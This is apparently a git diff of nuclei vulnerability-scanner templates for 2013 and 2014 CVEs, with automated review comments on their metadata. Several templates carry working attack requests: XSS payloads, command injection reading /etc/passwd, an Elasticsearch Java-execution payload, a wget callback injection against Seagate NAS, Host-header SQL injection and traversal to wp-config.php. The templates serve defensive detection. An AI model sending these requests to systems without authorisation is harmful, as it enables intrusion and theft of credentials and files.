+++ b/nuclei-templates/CVE-2013/cve-2013-2287.yaml
@@ -0,0 +1,37 @@
+id: CVE-2013-2287
+
+info:
+ name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-2287
+ - http://osvdb.org/90840
+ - https://www.dognaedis.com/vulns/DGS-SEC-16.html
+ classification:
+ cve-id: CVE-2013-2287
+ tags: cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
diff --git a/nuclei-templates/CVE-2013/cve-2013-3526.yaml b/nuclei-templates/CVE-2013/cve-2013-3526.yaml
new file mode 100644
index 0000000000..2f271d0f3b
--- /dev/null
+++ b/nuclei-templates/CVE-2013/cve-2013-3526.yaml
@@ -0,0 +1,38 @@
+id: CVE-2013-3526
+
+info:
+ name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-3526
+ - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html
+ - http://osvdb.org/92197
+ - http://www.securityfocus.com/bid/58948
+ classification:
+ cve-id: CVE-2013-3526
+ tags: cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/23
diff --git a/nuclei-templates/CVE-2013/cve-2013-6281.yaml b/nuclei-templates/CVE-2013/cve-2013-6281.yaml
deleted file mode 100644
index 2f67a808c3..0000000000
--- a/nuclei-templates/CVE-2013/cve-2013-6281.yaml
+++ /dev/null
@@ -1,49 +0,0 @@ -id: CVE-2013-6281 - -info: - name: WordPress Spreadsheet - Cross-Site Scripting - author: random-robbie - severity: medium - description: | - WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. - reference: - - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf - - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/ - - https://wordpress.org/plugins/dhtmlxspreadsheet/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 - - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2013-6281 - cwe-id: CWE-79 - metadata: - google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet - verified: "true" - tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin - -requests: - - raw: - - | - GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "page: ''" - - "dhx_rel_path" - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2014/CVE-2014-1203.yaml b/nuclei-templates/CVE-2014/CVE-2014-1203.yaml deleted file mode 100644 index 744b0ec237..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-1203.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: CVE-2014-1203 -info: - name: Eyou E-Mail <3.6 - Remote Code Execution - author: pikpikcu - severity: critical - description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. - reference: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 - - http://seclists.org/fulldisclosure/2014/Jan/32 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2014-1203 - cwe-id: CWE-77 - tags: rce,eyou -requests: - - raw: - - | - POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - type='|cat /etc/passwd||' - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2321.yaml b/nuclei-templates/CVE-2014/CVE-2014-2321.yaml new file mode 100644 index 0000000000..c26212d1b8 --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-2321.yaml 
@@ -0,0 +1,29 @@ +id: CVE-2014-2321 + +info: + name: ZTE Cable Modem Web Shell + description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. + author: geeknik + reference: + - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ + - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ + severity: high + tags: iot,cve,cve2014,zte + +requests: + - method: GET + path: + - "{{BaseURL}}/web_shell_cmd.gch" + + matchers-condition: and + matchers: + - type: word + words: + - "please input shell command" + - "ZTE Corporation. All rights reserved" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2323.yaml b/nuclei-templates/CVE-2014/CVE-2014-2323.yaml deleted file mode 100644 index c06086a11a..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-2323.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2014-2323 - -info: - name: Lighttpd 1.4.34 SQL Injection and Path Traversal - description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname). - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-2323 - - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt - - http://www.lighttpd.net/2014/3/12/1.4.35/ - author: geeknik - severity: critical - tags: cve,cve2014,sqli,lighttpd,injection - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2014-2323 - cwe-id: CWE-89 - -requests: - - raw: - - |+ - GET /etc/passwd HTTP/1.1 - Host: [::1]' UNION SELECT '/ - - unsafe: true - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - -# Enhanced by mp on 2022/02/24 
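Review bot: The added CVE-2014-2321.yaml has no `classification` block and no NVD reference, so although the id is a CVE nothing under `info` carries `cve-id`, a CVSS vector or a CWE for tooling that reads those fields; most other templates in this commit do. Add `classification:` with `cve-id: CVE-2014-2321` under `info`. The matcher confirms only that `web_shell_cmd.gch` is reachable and shows the command prompt text, so a `remediation` line would also help whoever triages a hit (restricting access to the device's management interface is the usual advice, to be confirmed against vendor guidance). The added CVE-2014-4942.yaml likewise has no `classification` block.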
diff --git a/nuclei-templates/CVE-2014/CVE-2014-2383.yaml b/nuclei-templates/CVE-2014/CVE-2014-2383.yaml deleted file mode 100644 index 910a491834..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-2383.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2014-2383 -info: - name: Arbitrary file read in dompdf < v0.6.0 - author: 0x_Akoko - severity: high - description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-2383 - - https://www.exploit-db.com/exploits/33004 - - http://seclists.org/fulldisclosure/2014/Apr/258 - - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/ - classification: - cve-id: CVE-2014-2383 - metadata: - unix-payload: /dompdf.php?input_file=/etc/passwd - win-payload: /dompdf.php?input_file=C:/windows/win.ini - tags: cve,cve2014,dompdf,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/dompdf.php?input_file=dompdf.php" - - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php" - - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php" - - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "application/pdf" - - 'filename="dompdf_out.pdf"' - part: header - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2962.yaml b/nuclei-templates/CVE-2014/CVE-2014-2962.yaml deleted file mode 100644 index f7845d4250..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-2962.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2014-2962 - -info: - name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal - author: daffainfo - severity: high - description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. - remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. - reference: - - https://www.kb.cert.org/vuls/id/774788 - - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l - tags: cve,cve2014,lfi,router,firmware,traversal - classification: - cve-id: CVE-2014-2962 - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/23 diff --git a/nuclei-templates/CVE-2014/CVE-2014-3120.yaml b/nuclei-templates/CVE-2014/CVE-2014-3120.yaml deleted file mode 100644 index c78a900373..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-3120.yaml +++ /dev/null 
@@ -1,55 +0,0 @@ -id: CVE-2014-3120 -info: - name: ElasticSearch v1.1.1/1.2 RCE - author: pikpikcu - severity: critical - description: | - The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. - reference: - - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - - https://www.elastic.co/blog/logstash-1-4-3-released - - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - - http://bouk.co/blog/elasticsearch-rce/ - classification: - cve-id: CVE-2014-3120 - tags: cve,cve2014,elastic,rce,elasticsearch -requests: - - raw: - - | - POST /_search?pretty HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en - Content-Type: application/x-www-form-urlencoded - - { - "size": 1, - "query": { - "filtered": { - "query": { - "match_all": { - } - } - } - }, - "script_fields": { - "command": { - "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" - } - } - } - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - - type: regex - regex: - - "root:.*:0:0:" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-3206.yaml b/nuclei-templates/CVE-2014/CVE-2014-3206.yaml deleted file mode 100644 index 64af96912b..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-3206.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2014-3206 - -info: - name: Seagate BlackArmor NAS - Command Injection - author: gy741 - severity: critical - description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 - - https://www.exploit-db.com/exploits/33159 - - https://www.exploit-db.com/exploits/33159/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2014-3206 - cwe-id: CWE-20 - tags: cve,cve2014,seagate,rce,edb - -requests: - - raw: - - | - GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - unsafe: true - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-3704.yaml b/nuclei-templates/CVE-2014/CVE-2014-3704.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-3704.yaml rename to nuclei-templates/CVE-2014/CVE-2014-3704.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4210.yaml b/nuclei-templates/CVE-2014/CVE-2014-4210.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4210.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4210.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-4535.yaml b/nuclei-templates/CVE-2014/CVE-2014-4535.yaml deleted file mode 100644 index af16cacede..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-4535.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: CVE-2014-4535 - -info: - name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting - author: daffainfo - severity: medium - reference: - - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 - tags: cve,cve2014,wordpress,wp-plugin,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2014-4535 - cwe-id: CWE-79 - description: "A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "'>" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-4539.yaml b/nuclei-templates/CVE-2014/CVE-2014-4539.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4539.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4539.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4544.yaml b/nuclei-templates/CVE-2014/CVE-2014-4544.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4544.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4544.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-4550.yaml b/nuclei-templates/CVE-2014/CVE-2014-4550.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4550.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4550.yaml 
diff --git a/nuclei-templates/CVE-2014/cve-2014-4592.yaml b/nuclei-templates/CVE-2014/CVE-2014-4592.yaml
similarity index 100%
rename from nuclei-templates/CVE-2014/cve-2014-4592.yaml
rename to nuclei-templates/CVE-2014/CVE-2014-4592.yaml
diff --git a/nuclei-templates/CVE-2014/cve-2014-4940.yaml b/nuclei-templates/CVE-2014/CVE-2014-4940.yaml
similarity index 100%
rename from nuclei-templates/CVE-2014/cve-2014-4940.yaml
rename to nuclei-templates/CVE-2014/CVE-2014-4940.yaml
diff --git a/nuclei-templates/CVE-2014/CVE-2014-4942.yaml b/nuclei-templates/CVE-2014/CVE-2014-4942.yaml
new file mode 100644
index 0000000000..3bfce6456b
--- /dev/null
+++ b/nuclei-templates/CVE-2014/CVE-2014-4942.yaml
@@ -0,0 +1,34 @@
+id: CVE-2014-4942
+info:
+ name: WP EasyCart - Information Disclosure
+ author: DhiyaneshDk
+ severity: low
+ description: |
+ The EasyCart (wp-easycart) plugin before 2.0.6 for WordPress allows remote attackers to obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.
+ reference:
+ - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150
+ - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4942
+ tags: cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "PHP Extension"
+ - "PHP Version"
+ condition: and
+ - type: status
+ status:
+ - 200
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '>PHP Version <\/td>([0-9.]+)'
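Review bot: The `info` block of the new CVE-2014-4942.yaml has no `classification` section, so the template carries no `cve-id` or `cwe-id`, although the lower-case copy deleted later in this commit had `cve-id: CVE-2014-4942` and `cwe-id: CWE-200`. Reports and filters that key on classification will presumably lose this finding's CVE mapping. I would restore the block under `info` with those two fields and keep the `wpscan` tag the removed copy carried, `tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure`.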
diff --git a/nuclei-templates/CVE-2014/cve-2014-5258.yaml b/nuclei-templates/CVE-2014/CVE-2014-5258.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-5258.yaml rename to nuclei-templates/CVE-2014/CVE-2014-5258.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-5368.yaml b/nuclei-templates/CVE-2014/CVE-2014-5368.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-5368.yaml rename to nuclei-templates/CVE-2014/CVE-2014-5368.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-6271.yaml b/nuclei-templates/CVE-2014/CVE-2014-6271.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-6271.yaml rename to nuclei-templates/CVE-2014/CVE-2014-6271.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-8799.yaml b/nuclei-templates/CVE-2014/CVE-2014-8799.yaml deleted file mode 100644 index 20d7d58d69..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-8799.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2014-8799 - -info: - name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-8799 - - https://www.exploit-db.com/exploits/35346 - - https://www.cvedetails.com/cve/CVE-2014-8799 - tags: cve,cve2014,wordpress,wp-plugin,lfi - classification: - cve-id: CVE-2014-8799 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php" - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - - "DB_USER" - - "DB_HOST" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/25 
diff --git a/nuclei-templates/CVE-2014/cve-2014-9444.yaml b/nuclei-templates/CVE-2014/CVE-2014-9444.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9444.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9444.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-9608.yaml b/nuclei-templates/CVE-2014/CVE-2014-9608.yaml deleted file mode 100644 index 2067b048e2..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-9608.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2014-9608 - -info: - name: Netsweeper 4.0.3 - Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. - reference: - - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - - https://nvd.nist.gov/vuln/detail/CVE-2014-9608 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2014-9608 - cwe-id: CWE-79 - tags: cve,cve2014,netsweeper,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/cve-2014-1203.yaml b/nuclei-templates/CVE-2014/cve-2014-1203.yaml new file mode 100644 index 0000000000..d8e32964a8 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-1203.yaml 
@@ -0,0 +1,39 @@
+id: CVE-2014-1203
+
+info:
+ name: Eyou E-Mail <3.6 - Remote Code Execution
+ author: pikpikcu
+ severity: critical
+ description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.
+ reference:
+ - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-1203
+ - http://seclists.org/fulldisclosure/2014/Jan/32
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2014-1203
+ cwe-id: CWE-77
+ tags: seclists,rce,eyou
+
+requests:
+ - raw:
+ - |
+ POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ type='|cat /etc/passwd||'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/06/01
diff --git a/nuclei-templates/CVE-2014/cve-2014-2321.yaml b/nuclei-templates/CVE-2014/cve-2014-2321.yaml
deleted file mode 100644
index 7f328db084..0000000000
--- a/nuclei-templates/CVE-2014/cve-2014-2321.yaml
+++ /dev/null
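Review bot: The `tags` line in cve-2014-1203.yaml is `seclists,rce,eyou` and omits `cve` and `cve2014`, which the other CVE-2014 templates added in this commit all carry, so a tag-filtered run would not select this template. I would change it to `tags: cve,cve2014,seclists,rce,eyou`. Separately, the description names the `domain` parameter of admin/domain/ip_login_set/d_ip_login_get.php while the request goes to `/webadm/?q=moni_detail.do&action=gragh` with a `type` field; the description should say which endpoint this check actually covers so a finding can be mapped to the right advisory.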
@@ -1,36 +0,0 @@ -id: CVE-2014-2321 - -info: - name: ZTE Cable Modem Web Shell - author: geeknik - severity: high - description: | - ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. - reference: - - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ - - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ - - https://nvd.nist.gov/vuln/detail/CVE-2014-2321 - - http://www.kb.cert.org/vuls/id/600724 - classification: - cve-id: CVE-2014-2321 - tags: iot,cve,cve2014,zte - -requests: - - method: GET - path: - - "{{BaseURL}}/web_shell_cmd.gch" - - matchers-condition: and - matchers: - - type: word - words: - - "please input shell command" - - "ZTE Corporation. All rights reserved" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2014/cve-2014-2323.yaml b/nuclei-templates/CVE-2014/cve-2014-2323.yaml new file mode 100644 index 0000000000..c813730817 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-2323.yaml 
@@ -0,0 +1,32 @@
+id: CVE-2014-2323
+
+info:
+ name: Lighttpd 1.4.34 SQL Injection and Path Traversal
+ author: geeknik
+ severity: critical
+ description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-2323
+ - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
+ - http://www.lighttpd.net/2014/3/12/1.4.35/
+ - http://seclists.org/oss-sec/2014/q1/561
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2014-2323
+ cwe-id: CWE-89
+ tags: cve,cve2014,sqli,lighttpd,injection
+
+requests:
+ - raw:
+ - |+
+ GET /etc/passwd HTTP/1.1
+ Host: [::1]' UNION SELECT '/
+
+ unsafe: true
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+
+# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/cve-2014-2383.yaml b/nuclei-templates/CVE-2014/cve-2014-2383.yaml
new file mode 100644
index 0000000000..bb404d9069
--- /dev/null
+++ b/nuclei-templates/CVE-2014/cve-2014-2383.yaml
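Review bot: The `description` covers only the SQL injection in mod_mysql_vhost.c, while the `name` also says Path Traversal and the single matcher is a passwd-file regex, so the template does not explain why file content is the success signal. I would extend the description with one sentence on how the injected host name leads to a file being served, or drop Path Traversal from the name if that is tracked separately. The regex matcher also has no `part:` and there is no status matcher, unlike the sibling templates; adding `part: body` would make the intent explicit.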
@@ -0,0 +1,42 @@
+id: CVE-2014-2383
+
+info:
+ name: Arbitrary file read in dompdf < v0.6.0
+ author: 0x_Akoko
+ severity: high
+ description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
+ - https://www.exploit-db.com/exploits/33004
+ - http://seclists.org/fulldisclosure/2014/Apr/258
+ - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
+ classification:
+ cve-id: CVE-2014-2383
+ metadata:
+ unix-payload: /dompdf.php?input_file=/etc/passwd
+ win-payload: /dompdf.php?input_file=C:/windows/win.ini
+ tags: cve,cve2014,dompdf,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
+ - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
+ - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
+ - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "application/pdf"
+ - 'filename="dompdf_out.pdf"'
+ part: header
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/cve-2014-2962.yaml b/nuclei-templates/CVE-2014/cve-2014-2962.yaml
new file mode 100644
index 0000000000..2c2c67d121
--- /dev/null
+++ b/nuclei-templates/CVE-2014/cve-2014-2962.yaml
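Review bot: The `name` says `dompdf < v0.6.0` while the `description` two lines below says the flaw affects dompdf before 0.6.1, so the two version bounds disagree and one of them will mislead patch triage. If the description is the authoritative one, the name should read `name: dompdf <0.6.1 - Arbitrary File Read`. The matchers only confirm that a PDF named dompdf_out.pdf comes back with status 200, which shows the `input_file` parameter is honoured but not that a file outside the chroot was read, so I would add a comment above `matchers:` saying a hit needs manual confirmation.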
@@ -0,0 +1,34 @@
+id: CVE-2014-2962
+
+info:
